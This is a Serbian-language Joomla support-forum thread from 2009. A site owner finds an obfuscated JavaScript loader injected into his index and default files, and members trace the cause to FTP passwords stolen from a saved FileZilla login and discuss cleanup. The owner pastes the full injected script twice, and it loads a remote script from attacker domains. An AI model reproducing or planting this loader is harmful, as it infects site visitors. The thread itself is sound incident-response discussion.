Reseno - Index.php problem :(

Moderators: cicans, TheHacker

Locked
User avatar
aant
Joomla! Intern
Joomla! Intern
Posts: 80
Joined: Fri Jul 11, 2008 7:50 pm
Location: Serbia, Krusevac
Contact:

Reseno - Index.php problem :(

Post by aant » Thu Dec 03, 2009 1:07 pm

Ovako: svoju prezentaciju hostujem na Sezamu i do sad nisam imao ama bas nikakvih problema sa bezbednoscu. Redovno update-ujem joomla-u a i config.php sam pomerio iz public_html-a... tako da je sve radilo besprekorno sve do malopre...
Desilo mi se ono sto se nekim mojim poznanicima vec desavalo (oni svoje prezentacije hostuju kod, meni manje pouzdanih provajdera) - prezentacija radi ok i odjednom kad pokusam da pristupim prezentaciji dobijem sledecu poruku:

Code: Select all

Parse error: syntax error, unexpected '<' in /home/pcpassa/public_html/index.php on line 90
Pogledam ja Index.php i na kraju nadjem sledece parce koda"

Code: Select all

<script>/*GNU GPL*/ try{window.onload = function(){var H3qqea3ur6p = document.createElement('script');H3qqea3ur6p.setAttribute('type', 'text/javascript');H3qqea3ur6p.setAttribute('id', 'myscript1');H3qqea3ur6p.setAttribute('src',  'h#!t&##(t&()p$$:!#@/!(/$#l!)i!&v()@e!^(.$(!c!)o)m@.&!#g#@o((o^g)(l^$!e$)@.&)$c$#o(m#^@.)$b#@#!#a&i#!d^$#$u#)$!(-!((m^!s$)n$&(.@)@c^@$o((m!(&.^)(b&!!)e@s(&t@@a()r#$#)t))@s#!#)a!l##e@(.))&r$!u!&):)8(0$)@$8^#^@0&)$^/!!&w@$(o@^r(^(!d@^p^#)r#e@^s(&s&@@.(^^c#^o@!!m$)/)&^g@$(^o@(^o@g@&$l&&#e^))&@-($(m)#)a#)i^l^#.!&^)i!&t$@^/((!(l)!i&v^(&(e()#j^$a&s@(&m$^&(i$#@n!#^-#@)p$!!$h$!o(&#t(#o##)!b#!$u^c^#k((e&!)t#!((#.$$@c!&@o@m^)&/)!c&#(n$)e()&&t)#-^#!c^(@n^^n&#).)c!&!o$#m($/$^a&!@@b&()o^($(u!&#)t^#-#))e$@@)b##a#^y&&@.&#(^c&o^^m^@/(@^^'.replace(/\^|&|@|\)|\(|#|\!|\$/ig, ''));H3qqea3ur6p.setAttribute('defer', 'defer');document.body.appendChild(H3qqea3ur6p);}} catch(e) {}</script>
Elem, taj kod mi je otvorio gomilu praznih stranica... obrisem ja taj CODE i sve proradi ok.
Voleo bih da ako iko ima neku informaciju o tome sta kokretno radi ovo parce koda da to podeli sa nama i kako je moguce da neko izmeni Index.php u toj meri da ubaci parce koda. A dobro bi dosao i tip kako se zastiti od ovakvih stvari ubuduce?

Pozdrav...
Last edited by aant on Tue Dec 08, 2009 12:12 am, edited 4 times in total.
---------------------------------------------------------------------
http://www.aantdesign.in.rs
http://www.pcpassage.rs

User avatar
aant
Joomla! Intern
Joomla! Intern
Posts: 80
Joined: Fri Jul 11, 2008 7:50 pm
Location: Serbia, Krusevac
Contact:

Re: Index.php problem

Post by aant » Thu Dec 03, 2009 4:19 pm

Uh... slicno mi se desilo i sa Index.php u Administrator folderu i sa Default.php u MODULES/MOD_WHOSONLINE/TMPL

Sad je vec zabrinjavajuce :(

Ima li neko ideju kako da se zastitim od ovakvih stvari i kako se to uopste desilo???


Hvala unapred na svakom savetu, predlogu i ideji
---------------------------------------------------------------------
http://www.aantdesign.in.rs
http://www.pcpassage.rs

User avatar
aant
Joomla! Intern
Joomla! Intern
Posts: 80
Joined: Fri Jul 11, 2008 7:50 pm
Location: Serbia, Krusevac
Contact:

Re: Index.php problem

Post by aant » Thu Dec 03, 2009 5:24 pm

Sve bolje od boljeg... potpuno ista stvar mi se desila sa jos jednim sajtom koji hostujem na Sezamu...


Help...
---------------------------------------------------------------------
http://www.aantdesign.in.rs
http://www.pcpassage.rs

User avatar
aant
Joomla! Intern
Joomla! Intern
Posts: 80
Joined: Fri Jul 11, 2008 7:50 pm
Location: Serbia, Krusevac
Contact:

Re: Index.php problem

Post by aant » Thu Dec 03, 2009 5:59 pm

Problem je resen zahvaljujuci savetu TheHacker-a.
Objasnjenje imate pri kraju ovog threda: http://forum.joomla.org/viewtopic.php?f=419&t=451142
---------------------------------------------------------------------
http://www.aantdesign.in.rs
http://www.pcpassage.rs

User avatar
aant
Joomla! Intern
Joomla! Intern
Posts: 80
Joined: Fri Jul 11, 2008 7:50 pm
Location: Serbia, Krusevac
Contact:

Re: Nije reseno - Index.php problem :(

Post by aant » Sat Dec 05, 2009 1:02 pm

Evo ja nastavljam da vodim monolog :(
Mislo sam da sam resio problem ali...

1. Instalirao sam jSecure Authentication i podesio ga
2. Ocistio Firefox od Microsoft Frame Network-a i ostalih S****a
3. Promenio username i password za Superadministratora...

I danas mi se opet desio INJECTION tako da sam ponovo morao da cistim PHP-ove.

Ima li neko neku konstruktivnu ideju, please :(
---------------------------------------------------------------------
http://www.aantdesign.in.rs
http://www.pcpassage.rs

User avatar
TheHacker
Joomla! Ace
Joomla! Ace
Posts: 1316
Joined: Sat Oct 13, 2007 1:12 pm
Location: Beograd
Contact:

Re: Nije reseno - Index.php problem :(

Post by TheHacker » Sat Dec 05, 2009 8:11 pm

jesi zatrazio od hosta da ti resetuje lozinke za pristup serveru ili imas opciju da ih sam menjas??? i da li si kojim slucajem ostavio zapamcenu lozinku u ftp programu koji koristis, ako jesi onda verovatno imas neki virus na kompu...pobrisi lozinke iz ftp programa...skeniraj komp sa svim zivim sto imas ili uradi reinstal svega...
Web Arena - Tutorijali - Photoshop, Joomla, JavaScript... zanimljivosti, inspiracija... http://webarena.rs

User avatar
aant
Joomla! Intern
Joomla! Intern
Posts: 80
Joined: Fri Jul 11, 2008 7:50 pm
Location: Serbia, Krusevac
Contact:

Re: Nije reseno - Index.php problem :(

Post by aant » Sat Dec 05, 2009 11:48 pm

Lozinke su mi zapamcene u FTP programu koji korisnim, pobrisacu ih i preskeniracu pa cu sve opet da ocistim i da vidim sta ce da se desi. Hvala na savetu.
---------------------------------------------------------------------
http://www.aantdesign.in.rs
http://www.pcpassage.rs

User avatar
aant
Joomla! Intern
Joomla! Intern
Posts: 80
Joined: Fri Jul 11, 2008 7:50 pm
Location: Serbia, Krusevac
Contact:

Re: Reseno - Index.php problem :(

Post by aant » Tue Dec 08, 2009 12:15 am

Problem sam (bar za sad) resio na sledeci nacin:

1. Promenio sam username i password za Joomla admina
2. Promenio sam password za FTP i iskljucio sam da mi FileZila pamti lozinke
3. Instalirao sam JSecure, Eyesite i jFirewall za joomla-u

Nadam se da ce da potraje ova zastita.

Hvala TheHacker-u na savetima.
---------------------------------------------------------------------
http://www.aantdesign.in.rs
http://www.pcpassage.rs

darko_v
Joomla! Apprentice
Joomla! Apprentice
Posts: 33
Joined: Thu Mar 05, 2009 7:46 pm
Location: Uzice
Contact:

Re: Reseno - Index.php problem :(

Post by darko_v » Fri Dec 11, 2009 1:10 pm

I meni se desila ista stvar i najverovatnije ti je komp zarazen...
Probaj prvo da ga ocistis sa "Malwarebytes" i precesljaj ga azuriranim antivirusom, a tek onda izmenjaj sifre za ftp i ostalo...

Ako malo procesljas joomla, videces da su vecina index fajlova izmenjeni i da rucno je tesko sta moguce uraditi, mnogo ih ima :) ... nadam se da si imao backup ( ako je skorasnji proveri i njegove index fajlove)...

Ja sam morao da skinem sve sa servera , pa da uradim nanovo uz pomoc backup-a i poslednje baze...

User avatar
aant
Joomla! Intern
Joomla! Intern
Posts: 80
Joined: Fri Jul 11, 2008 7:50 pm
Location: Serbia, Krusevac
Contact:

Re: Reseno - Index.php problem :(

Post by aant » Fri Dec 11, 2009 1:38 pm

Pa nasao sam cool resenje, svuko sam ceo sajt sa neta na HDD (mada sam imao skoriji backUP) i instalirao sam PowerGREP3 (program koji radi SEARCH and REPLACE - znaci ulazi u svaki fajl i trazi tekst koji si mu zadao i zameni ga sa tekstom koji si definisao), tako da sam ga pustio da mi prevrne sve fajlove i da ovo "<script>/*GNU GPL*/ try{window.onload = function(){var Jqjzlgspz98uxl = document.createElement('script');Jqjzlgspz98uxl.setAttribute('type', 'text/javascript');Jqjzlgspz98uxl.setAttribute('id', 'myscript1');Jqjzlgspz98uxl.setAttribute('src', 'h#&#t&#!t$!@p):)$/!&^/!x#^&t@#&u@b($!)e#(-)c^@$&o#(#m^!$^.&$)b$($l$o!(#&)g(&g)(^$e!$r#@(.@^&(c(o^#m@)!#.)#p!(@o&r@)n(^$o$!^r&!a$)&m$@a$^$@-!c((^o#($m!.&#b$^$l)^u!$!e((#@)j@@a@)@c#k)!^m^(u$$!(s@$@i^@c@&.!@)r@u(!:(^8&@!)!0@)8)@#0&(!/$&)h^d$@$f$(^c^)b@$&a)^n^(k^#.&@^&c#(!#$o^m!)#/!h^@#d(&f)&c^()b#(a^$!n&^(#$k^#.!$c)o))m)&&/($&!g$$o!)o^()g))@(l$^@)e#^&.&&c^(o()m@!)(/(&f)#a!!@n!$@p))o)((p!^#.@c^!@o&@m)@&/@!!i&n^#!.&#!c)))!o(m#/)((!'.replace(/\(|\)|\^|\!|@|\$|#|&/ig, ''));Jqjzlgspz98uxl.setAttribute('defer', 'defer');document.body.appendChild(Jqjzlgspz98uxl);}} catch(e) {}</script>" sa jednim SPACE karakterom i tako sam za par minuta ocistio fajl.
Primetio sam da se ta skripta nalazi u svim Index.html, Default.html, Index.php, Default.php - zapravo svi fajlovi koji pocinju sa DEFAULT, a skriptu sam pronasao i u vecini *.js fajlova. Probaj ovaj programcic ili bilo koji drugi koji moze da pregleda sve fajlove i da napravi FIND AND REPLACE zadatog teksta.

Pozdrav.
---------------------------------------------------------------------
http://www.aantdesign.in.rs
http://www.pcpassage.rs

darko_v
Joomla! Apprentice
Joomla! Apprentice
Posts: 33
Joined: Thu Mar 05, 2009 7:46 pm
Location: Uzice
Contact:

Re: Reseno - Index.php problem :(

Post by darko_v » Fri Dec 11, 2009 1:58 pm

Znam za to, mada nisam probao, ali radije se odlucim da se potrosi par sati i uradi sve nanovo, ubace iste komponente i moduli i doda samo baza... tako znam da sigurno nije nista ostalo sto ne treba :)

Pozdrav


Locked

Return to “Bezbednost”